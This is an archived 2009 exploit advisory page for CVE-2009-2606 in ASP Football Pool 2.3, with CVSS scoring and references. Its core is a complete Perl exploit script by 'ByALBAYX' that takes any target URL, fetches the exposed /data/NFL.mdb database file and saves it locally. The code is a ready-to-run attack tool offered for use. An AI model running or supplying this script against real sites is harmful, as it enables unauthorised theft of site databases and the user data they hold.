ASP Football Pool 2.3 Remote Database Disclosure Vulnerability

2009.07.28

Credit: ByALBAYX

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2009-2606

CWE: CWE-264

CVSS Base Score: 5/10

Impact Subscore: 2.9/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Partial

Integrity impact: None

Availability impact: None

#!/usr/bin/perl
#
#
#ASP Football Pool v2.3
#
#Script    : ASP Football Pool v2.3
#
#Demo      : http://brainjar.com/AspFootballPool/demo1
#
#Download  : http://www.brainjar.com/AspFootballPool/download/AspFootballPool_2.3.zip
#
#              _.--"""""--._
#            .'             '.
#           /                 \
#          ;       C4TEAM      ;
#          |                   |
#          |                   |
#          ;                   ;                   ByALBAYX
#           \ (`'--,    ,--'`) /
#            \ \  _ )  ( _  / /                 WWW.C4TEAM.ORG
#             ) )(')/  \(')( (
#            (_ `""` /\ `""` _)
#             \`"-, /  \ ,-"`/                       
#              `\ / `""` \ /`
#               |/\/\/\/\/\|                      
#               |\        /|
#               ; |/\/\/\| ;
#                \`-`--`-`/
#                 \      /
#                  ',__,'
#
#
#ASP Football Pool v2.3 Remote Database Disclosure Exploit
#
#Exploited ByALBAYX
##########
#


use lwp::UserAgent;

system('cls');
system('title ASP Football Pool v2.3 Database Disclosure Exploit');
system('color 2');
if (!defined($ARGV[0])) {print "[!] Usage : \n    exploit.pl http://site.com\n";exit();}
if ($ARGV[0] =~ /http:\/\// ) { $site = $ARGV[0]."/"; } else { $site = "http://".$ARGV[0]."/"; }
print "\n\n[-] ASP Football Pool v2.3 Database Disclosure Exploit\n";
print "[-]Exploited ByALBAYX \n\n\n";
print "[!] Exploiting $site ....\n";
my $site      = $ARGV[0] ;
my $target    = $site."/data/NFL.mdb" ;
my $useragent = LWP::UserAgent->new();
my $request   = $useragent->get($target,":content_file" => "c:/db.mdb");
if ($request->is_success) {print "[+] $site Kaydedildi! Git= c:/db.mdb";exit();}
else {print "[!] Exploit $site Failed !\n[!] ".$request->status_line."\n";exit();}

References:

http://www.milw0rm.com/exploits/8852

http://secunia.com/advisories/35317

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

ASP Football Pool 2.3 Remote Database Disclosure Vulnerability

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.